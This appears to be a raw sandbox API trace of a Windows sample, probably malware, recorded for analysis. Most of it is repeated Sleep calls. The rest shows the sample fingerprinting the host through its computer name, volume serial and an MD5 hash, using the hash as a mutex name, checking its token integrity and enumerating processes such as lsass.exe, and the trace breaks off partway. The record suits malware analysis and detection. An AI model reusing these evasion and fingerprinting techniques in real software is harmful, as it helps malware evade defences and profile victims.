Sleep (dwMilliseconds=0xa) [0178.829] Sleep (dwMilliseconds=0xa) [0178.873] Sleep (dwMilliseconds=0xa) [0178.920] Sleep (dwMilliseconds=0xa) [0178.954] Sleep (dwMilliseconds=0xa) [0178.966] Sleep (dwMilliseconds=0xa) [0178.984] Sleep (dwMilliseconds=0xa) [0178.997] Sleep (dwMilliseconds=0xa) [0179.014] Sleep (dwMilliseconds=0xa) [0179.028] Sleep (dwMilliseconds=0xa) [0179.045] Sleep (dwMilliseconds=0xa) [0179.081] Sleep (dwMilliseconds=0xa) [0179.122] Sleep (dwMilliseconds=0xa) [0179.169] Sleep (dwMilliseconds=0xa) [0179.196] Sleep (dwMilliseconds=0xa) [0179.200] Sleep (dwMilliseconds=0xa) [0179.216] Sleep (dwMilliseconds=0xa) [0179.310] Sleep (dwMilliseconds=0xa) [0179.368] Sleep (dwMilliseconds=0xa) [0179.404] Sleep (dwMilliseconds=0xa) [0179.453] Sleep (dwMilliseconds=0xa) [0179.465] Sleep (dwMilliseconds=0xa) [0179.481] Sleep (dwMilliseconds=0xa) [0179.497] Sleep (dwMilliseconds=0xa) [0179.513] Sleep (dwMilliseconds=0xa) [0179.528] Sleep (dwMilliseconds=0xa) [0179.590] Sleep (dwMilliseconds=0xa) [0179.638] Sleep (dwMilliseconds=0xa) [0179.678] Sleep (dwMilliseconds=0xa) [0179.683] Sleep (dwMilliseconds=0xa) [0179.699] Sleep (dwMilliseconds=0xa) [0179.715] Sleep (dwMilliseconds=0xa) [0179.731] Sleep (dwMilliseconds=0xa) [0179.747] Sleep (dwMilliseconds=0xa) [0179.763] Sleep (dwMilliseconds=0xa) [0179.808] Sleep (dwMilliseconds=0xa) [0179.857] Sleep (dwMilliseconds=0xa) [0179.873] Sleep (dwMilliseconds=0xa) [0179.886] Sleep (dwMilliseconds=0xa) [0179.902] Sleep (dwMilliseconds=0xa) [0179.918] Sleep (dwMilliseconds=0xa) [0179.933] Sleep (dwMilliseconds=0xa) [0179.949] Sleep (dwMilliseconds=0xa) [0179.966] Sleep (dwMilliseconds=0xa) [0180.011] Sleep (dwMilliseconds=0xa) [0180.073] Sleep (dwMilliseconds=0xa) [0180.095] Sleep (dwMilliseconds=0xa) [0180.107] Sleep (dwMilliseconds=0xa) [0180.120] Sleep (dwMilliseconds=0xa) [0180.136] Sleep (dwMilliseconds=0xa) [0180.152] Sleep (dwMilliseconds=0xa) [0180.168] Sleep (dwMilliseconds=0xa) [0180.183] Sleep (dwMilliseconds=0xa) [0180.230] Sleep (dwMilliseconds=0xa) [0180.278] Sleep (dwMilliseconds=0xa) [0180.312] Sleep (dwMilliseconds=0xa) [0180.323] Sleep (dwMilliseconds=0xa) [0180.339] Sleep (dwMilliseconds=0xa) [0180.354] Sleep (dwMilliseconds=0xa) [0180.370] Sleep (dwMilliseconds=0xa) [0180.387] Sleep (dwMilliseconds=0xa) [0180.401] Sleep (dwMilliseconds=0xa) [0180.448] Sleep (dwMilliseconds=0xa) [0180.496] Sleep (dwMilliseconds=0xa) [0180.529] Sleep (dwMilliseconds=0xa) [0180.541] Sleep (dwMilliseconds=0xa) [0180.572] Sleep (dwMilliseconds=0xa) [0180.573] Sleep (dwMilliseconds=0xa) [0180.588] Sleep (dwMilliseconds=0xa) [0180.605] Sleep (dwMilliseconds=0xa) [0180.620] Sleep (dwMilliseconds=0xa) [0180.683] Sleep (dwMilliseconds=0xa) [0180.730] Sleep (dwMilliseconds=0xa) [0180.780] Sleep (dwMilliseconds=0xa) [0180.791] Sleep (dwMilliseconds=0xa) [0180.807] Sleep (dwMilliseconds=0xa) [0180.823] Sleep (dwMilliseconds=0xa) [0180.838] Sleep (dwMilliseconds=0xa) [0180.858] Sleep (dwMilliseconds=0xa) [0180.900] Sleep (dwMilliseconds=0xa) [0180.949] Sleep (dwMilliseconds=0xa) [0180.974] Sleep (dwMilliseconds=0xa) [0180.978] Sleep (dwMilliseconds=0xa) [0180.994] Sleep (dwMilliseconds=0xa) [0181.012] Sleep (dwMilliseconds=0xa) [0181.025] Sleep (dwMilliseconds=0xa) [0181.041] Sleep (dwMilliseconds=0xa) [0181.057] Sleep (dwMilliseconds=0xa) [0181.072] Sleep (dwMilliseconds=0xa) [0181.105] Sleep (dwMilliseconds=0xa) [0181.153] Sleep (dwMilliseconds=0xa) [0181.198] Sleep (dwMilliseconds=0xa) [0181.214] Sleep (dwMilliseconds=0xa) [0181.228] Sleep (dwMilliseconds=0xa) [0181.244] Sleep (dwMilliseconds=0xa) [0181.259] Sleep (dwMilliseconds=0xa) [0181.276] Sleep (dwMilliseconds=0xa) [0181.291] Sleep (dwMilliseconds=0xa) [0181.337] Sleep (dwMilliseconds=0xa) [0181.385] Sleep (dwMilliseconds=0xa) [0181.418] Sleep (dwMilliseconds=0xa) [0181.431] Sleep (dwMilliseconds=0xa) [0181.446] Sleep (dwMilliseconds=0xa) [0181.462] Sleep (dwMilliseconds=0xa) [0181.478] Sleep (dwMilliseconds=0xa) [0181.494] Sleep (dwMilliseconds=0xa) [0181.541] Sleep (dwMilliseconds=0xa) [0181.603] Sleep (dwMilliseconds=0xa) [0181.650] Sleep (dwMilliseconds=0xa) [0181.665] Sleep (dwMilliseconds=0xa) [0181.690] Sleep (dwMilliseconds=0xa) [0181.696] Sleep (dwMilliseconds=0xa) [0181.712] Sleep (dwMilliseconds=0xa) [0181.727] Sleep (dwMilliseconds=0xa) [0181.774] Sleep (dwMilliseconds=0xa) [0181.822] Sleep (dwMilliseconds=0xa) [0181.870] Sleep (dwMilliseconds=0xa) [0181.883] Sleep (dwMilliseconds=0xa) [0181.899] Sleep (dwMilliseconds=0xa) [0181.914] Sleep (dwMilliseconds=0xa) [0181.931] Sleep (dwMilliseconds=0xa) [0181.946] Sleep (dwMilliseconds=0xa) [0181.992] Sleep (dwMilliseconds=0xa) [0182.043] Sleep (dwMilliseconds=0xa) [0182.106] Sleep (dwMilliseconds=0xa) [0182.146] Sleep (dwMilliseconds=0xa) [0182.161] Sleep (dwMilliseconds=0xa) [0182.164] Sleep (dwMilliseconds=0xa) [0182.212] Sleep (dwMilliseconds=0xa) [0182.258] Sleep (dwMilliseconds=0xa) [0182.273] Sleep (dwMilliseconds=0xa) [0182.289] Sleep (dwMilliseconds=0xa) [0182.304] Sleep (dwMilliseconds=0xa) [0182.320] Sleep (dwMilliseconds=0xa) [0182.336] Sleep (dwMilliseconds=0xa) [0182.351] Sleep (dwMilliseconds=0xa) [0182.368] Sleep (dwMilliseconds=0xa) [0182.414] Sleep (dwMilliseconds=0xa) [0182.486] Sleep (dwMilliseconds=0xa) [0182.508] Sleep (dwMilliseconds=0xa) [0182.523] Sleep (dwMilliseconds=0xa) [0182.538] Sleep (dwMilliseconds=0xa) [0182.579] Sleep (dwMilliseconds=0xa) [0182.586] Sleep (dwMilliseconds=0xa) [0182.632] Sleep (dwMilliseconds=0xa) [0182.679] Sleep (dwMilliseconds=0xa) [0182.698] Sleep (dwMilliseconds=0xa) [0182.710] Sleep (dwMilliseconds=0xa) [0182.726] Sleep (dwMilliseconds=0xa) [0182.741] Sleep (dwMilliseconds=0xa) [0182.757] Sleep (dwMilliseconds=0xa) [0182.773] Sleep (dwMilliseconds=0xa) [0182.788] Sleep (dwMilliseconds=0xa) [0182.836] Sleep (dwMilliseconds=0xa) [0182.881] Sleep (dwMilliseconds=0xa) [0182.901] Sleep (dwMilliseconds=0xa) [0182.913] Sleep (dwMilliseconds=0xa) [0182.929] Sleep (dwMilliseconds=0xa) [0182.944] Sleep (dwMilliseconds=0xa) [0182.960] Sleep (dwMilliseconds=0xa) [0182.975] Sleep (dwMilliseconds=0xa) [0182.991] Sleep (dwMilliseconds=0xa) [0183.038] Sleep (dwMilliseconds=0xa) [0183.084] Sleep (dwMilliseconds=0xa) [0183.123] Sleep (dwMilliseconds=0xa) [0183.131] Sleep (dwMilliseconds=0xa) [0183.148] Sleep (dwMilliseconds=0xa) [0183.164] Sleep (dwMilliseconds=0xa) [0183.178] Sleep (dwMilliseconds=0xa) [0183.193] Sleep (dwMilliseconds=0xa) [0183.209] Sleep (dwMilliseconds=0xa) [0183.256] Sleep (dwMilliseconds=0xa) [0183.303] Sleep (dwMilliseconds=0xa) [0183.334] Sleep (dwMilliseconds=0xa) [0183.335] Sleep (dwMilliseconds=0xa) [0183.350] Sleep (dwMilliseconds=0xa) [0183.365] Sleep (dwMilliseconds=0xa) [0183.382] Sleep (dwMilliseconds=0xa) [0183.396] Sleep (dwMilliseconds=0xa) [0183.413] Sleep (dwMilliseconds=0xa) [0183.460] Sleep (dwMilliseconds=0xa) [0183.507] Sleep (dwMilliseconds=0xa) [0183.541] Sleep (dwMilliseconds=0xa) [0183.552] Sleep (dwMilliseconds=0xa) [0183.586] Sleep (dwMilliseconds=0xa) [0183.599] Sleep (dwMilliseconds=0xa) [0183.616] Sleep (dwMilliseconds=0xa) [0183.630] Sleep (dwMilliseconds=0xa) [0183.677] Sleep (dwMilliseconds=0xa) [0183.727] Sleep (dwMilliseconds=0xa) [0183.763] Sleep (dwMilliseconds=0xa) [0183.776] Sleep (dwMilliseconds=0xa) [0183.786] Sleep (dwMilliseconds=0xa) [0183.802] Sleep (dwMilliseconds=0xa) [0183.818] Sleep (dwMilliseconds=0xa) [0183.835] Sleep (dwMilliseconds=0xa) [0183.849] Sleep (dwMilliseconds=0xa) [0183.896] Sleep (dwMilliseconds=0xa) [0183.943] Sleep (dwMilliseconds=0xa) [0183.966] Sleep (dwMilliseconds=0xa) [0183.973] Sleep (dwMilliseconds=0xa) [0183.989] Sleep (dwMilliseconds=0xa) [0184.007] Sleep (dwMilliseconds=0xa) [0184.021] Sleep (dwMilliseconds=0xa) [0184.036] Sleep (dwMilliseconds=0xa) [0184.053] Sleep (dwMilliseconds=0xa) [0184.098] Sleep (dwMilliseconds=0xa) [0184.145] Sleep (dwMilliseconds=0xa) [0184.183] Sleep (dwMilliseconds=0xa) [0184.192] Sleep (dwMilliseconds=0xa) [0184.221] Sleep (dwMilliseconds=0xa) [0184.223] Sleep (dwMilliseconds=0xa) [0184.239] Sleep (dwMilliseconds=0xa) [0184.254] Sleep (dwMilliseconds=0xa) [0184.301] Sleep (dwMilliseconds=0xa) [0184.348] Sleep (dwMilliseconds=0xa) [0184.375] Sleep (dwMilliseconds=0xa) [0184.379] Sleep (dwMilliseconds=0xa) [0184.395] Sleep (dwMilliseconds=0xa) [0184.410] Sleep (dwMilliseconds=0xa) [0184.426] Sleep (dwMilliseconds=0xa) [0184.441] Sleep (dwMilliseconds=0xa) [0184.457] Sleep (dwMilliseconds=0xa) [0184.473] Sleep (dwMilliseconds=0xa) [0184.521] Sleep (dwMilliseconds=0xa) [0184.603] Sleep (dwMilliseconds=0xa) [0184.638] Sleep (dwMilliseconds=0xa) [0184.644] Sleep (dwMilliseconds=0xa) [0184.660] Sleep (dwMilliseconds=0xa) [0184.676] Sleep (dwMilliseconds=0xa) [0184.691] Sleep (dwMilliseconds=0xa) [0184.707] Sleep (dwMilliseconds=0xa) [0184.723] Sleep (dwMilliseconds=0xa) [0184.776] Sleep (dwMilliseconds=0xa) [0184.816] Sleep (dwMilliseconds=0xa) [0184.847] Sleep (dwMilliseconds=0xa) [0184.847] Sleep (dwMilliseconds=0xa) [0184.863] Sleep (dwMilliseconds=0xa) [0184.878] Sleep (dwMilliseconds=0xa) [0184.894] Sleep (dwMilliseconds=0xa) [0184.910] Sleep (dwMilliseconds=0xa) [0184.925] Sleep (dwMilliseconds=0xa) [0184.943] Sleep (dwMilliseconds=0xa) [0184.988] Sleep (dwMilliseconds=0xa) [0185.034] Sleep (dwMilliseconds=0xa) [0185.054] Sleep (dwMilliseconds=0xa) [0185.065] Sleep (dwMilliseconds=0xa) [0185.081] Sleep (dwMilliseconds=0xa) [0185.097] Sleep (dwMilliseconds=0xa) [0185.113] Sleep (dwMilliseconds=0xa) [0185.128] Sleep (dwMilliseconds=0xa) [0185.143] Sleep (dwMilliseconds=0xa) [0185.190] Sleep (dwMilliseconds=0xa) [0185.239] Sleep (dwMilliseconds=0xa) [0185.263] Sleep (dwMilliseconds=0xa) [0185.285] Sleep (dwMilliseconds=0xa) [0185.299] Sleep (dwMilliseconds=0xa) [0185.315] Sleep (dwMilliseconds=0xa) [0185.331] Sleep (dwMilliseconds=0xa) [0185.348] Sleep (dwMilliseconds=0xa) [0185.394] Sleep (dwMilliseconds=0xa) [0185.440] Sleep (dwMilliseconds=0xa) [0185.458] Sleep (dwMilliseconds=0xa) [0185.471] Sleep (dwMilliseconds=0xa) [0185.487] Sleep (dwMilliseconds=0xa) [0185.504] Sleep (dwMilliseconds=0xa) [0185.518] Sleep (dwMilliseconds=0xa) [0185.534] Sleep (dwMilliseconds=0xa) [0185.549] Sleep (dwMilliseconds=0xa) [0185.613] Sleep (dwMilliseconds=0xa) [0185.659] Sleep (dwMilliseconds=0xa) [0185.693] Sleep (dwMilliseconds=0xa) [0185.705] Sleep (dwMilliseconds=0xa) [0185.722] Sleep (dwMilliseconds=0xa) [0185.736] Sleep (dwMilliseconds=0xa) [0185.752] Sleep (dwMilliseconds=0xa) [0185.768] Sleep (dwMilliseconds=0xa) [0185.795] Sleep (dwMilliseconds=0xa) [0185.831] Sleep (dwMilliseconds=0xa) [0185.877] Sleep (dwMilliseconds=0xa) [0185.906] Sleep (dwMilliseconds=0xa) [0185.908] Sleep (dwMilliseconds=0xa) [0185.924] Sleep (dwMilliseconds=0xa) [0185.940] Sleep (dwMilliseconds=0xa) [0185.955] Sleep (dwMilliseconds=0xa) [0185.973] Sleep (dwMilliseconds=0xa) [0185.986] Sleep (dwMilliseconds=0xa) [0186.003] Sleep (dwMilliseconds=0xa) [0186.049] Sleep (dwMilliseconds=0xa) [0186.095] Sleep (dwMilliseconds=0xa) [0186.137] Sleep (dwMilliseconds=0xa) [0186.142] Sleep (dwMilliseconds=0xa) [0186.162] Sleep (dwMilliseconds=0xa) [0186.173] Sleep (dwMilliseconds=0xa) [0186.189] Sleep (dwMilliseconds=0xa) [0186.205] Sleep (dwMilliseconds=0xa) [0186.227] Sleep (dwMilliseconds=0xa) [0186.269] Sleep (dwMilliseconds=0xa) [0186.313] Sleep (dwMilliseconds=0xa) [0186.336] GetSystemDirectoryA (in: lpBuffer=0x3a3fc40, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0186.337] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" [0186.337] RtlGetVersion (in: lpVersionInformation=0x2580457 | out: lpVersionInformation=0x2580457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0186.337] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x3a3fc28 | out: TokenHandle=0x3a3fc28*=0x6e0) returned 1 [0186.337] GetTokenInformation (in: TokenHandle=0x6e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x3a3fc20 | out: TokenInformation=0x0, ReturnLength=0x3a3fc20) returned 0 [0186.337] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x25) returned 0x66e12f0 [0186.337] GetTokenInformation (in: TokenHandle=0x6e0, TokenInformationClass=0x19, TokenInformation=0x66e12f0, TokenInformationLength=0x1c, ReturnLength=0x3a3fc20 | out: TokenInformation=0x66e12f0, ReturnLength=0x3a3fc20) returned 1 [0186.337] GetSidSubAuthorityCount (pSid=0x66e1300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x66e1301 [0186.338] GetSidSubAuthority (pSid=0x66e1300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x66e1308 [0186.338] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x25 [0186.338] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0186.338] CloseHandle (hObject=0x6e0) returned 1 [0186.338] GetComputerNameA (in: lpBuffer=0x3a3fcf0, nSize=0x3a3fd30 | out: lpBuffer="Q9IATRKPRH", nSize=0x3a3fd30) returned 1 [0186.338] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x3a3fd20, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x3a3fd20*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0186.341] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x29) returned 0x66e12f0 [0186.341] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x14) returned 0x66e1330 [0186.341] wsprintfA (in: param_1=0x66e12f0, param_2="%s%08X%08X" | out: param_1="Q9IATRKPRH99FC78698443A5AF") returned 26 [0186.341] CryptAcquireContextA (in: phProv=0x3a3fc78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3a3fc78*=0x6e9eb80) returned 1 [0186.343] CryptCreateHash (in: hProv=0x6e9eb80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3a3fc70 | out: phHash=0x3a3fc70) returned 1 [0186.343] lstrlenA (lpString="Q9IATRKPRH99FC78698443A5AF") returned 26 [0186.343] CryptHashData (hHash=0x3e8c550, pbData=0x66e12f0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0186.344] CryptGetHashParam (in: hHash=0x3e8c550, dwParam=0x2, pbData=0x3a3fc80, pdwDataLen=0x3a3fcb0, dwFlags=0x0 | out: pbData=0x3a3fc80, pdwDataLen=0x3a3fcb0) returned 1 [0186.344] wsprintfA (in: param_1=0x258020c, param_2="%02X" | out: param_1="4B") returned 2 [0186.344] wsprintfA (in: param_1=0x258020e, param_2="%02X" | out: param_1="CD") returned 2 [0186.344] wsprintfA (in: param_1=0x2580210, param_2="%02X" | out: param_1="65") returned 2 [0186.344] wsprintfA (in: param_1=0x2580212, param_2="%02X" | out: param_1="9A") returned 2 [0186.344] wsprintfA (in: param_1=0x2580214, param_2="%02X" | out: param_1="D8") returned 2 [0186.344] wsprintfA (in: param_1=0x2580216, param_2="%02X" | out: param_1="F3") returned 2 [0186.344] wsprintfA (in: param_1=0x2580218, param_2="%02X" | out: param_1="47") returned 2 [0186.344] wsprintfA (in: param_1=0x258021a, param_2="%02X" | out: param_1="B5") returned 2 [0186.344] wsprintfA (in: param_1=0x258021c, param_2="%02X" | out: param_1="B4") returned 2 [0186.344] wsprintfA (in: param_1=0x258021e, param_2="%02X" | out: param_1="51") returned 2 [0186.344] wsprintfA (in: param_1=0x2580220, param_2="%02X" | out: param_1="91") returned 2 [0186.344] wsprintfA (in: param_1=0x2580222, param_2="%02X" | out: param_1="8C") returned 2 [0186.344] wsprintfA (in: param_1=0x2580224, param_2="%02X" | out: param_1="D8") returned 2 [0186.344] wsprintfA (in: param_1=0x2580226, param_2="%02X" | out: param_1="91") returned 2 [0186.344] wsprintfA (in: param_1=0x2580228, param_2="%02X" | out: param_1="C8") returned 2 [0186.344] wsprintfA (in: param_1=0x258022a, param_2="%02X" | out: param_1="23") returned 2 [0186.344] CryptDestroyHash (hHash=0x3e8c550) returned 1 [0186.344] CryptReleaseContext (hProv=0x6e9eb80, dwFlags=0x0) returned 1 [0186.344] wsprintfA (in: param_1=0x258022c, param_2="%08X" | out: param_1="8443A5AF") returned 8 [0186.344] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e1330) returned 0x14 [0186.344] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e1330) returned 1 [0186.344] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x29 [0186.345] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0186.345] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0xe) returned 0x66e12f0 [0186.345] wsprintfA (in: param_1=0x2580dbe, param_2="%sFF" | out: param_1="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 42 [0186.345] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0xe [0186.345] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0186.345] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned 0x6e0 [0186.346] RtlGetLastWin32Error () returned 0xb7 [0186.346] CloseHandle (hObject=0x6e0) returned 1 [0186.346] RtlExitUserThread (Status=0x0) Thread: id = 96 os_tid = 0xf5c [0160.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb64 [0160.840] Process32First (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.842] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0160.844] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0160.846] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.848] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0160.850] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.851] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0160.853] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0160.856] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0160.858] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0160.859] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.861] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.863] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.865] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.867] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.869] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.936] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0160.937] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0160.939] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.941] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0160.943] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0160.945] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.947] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 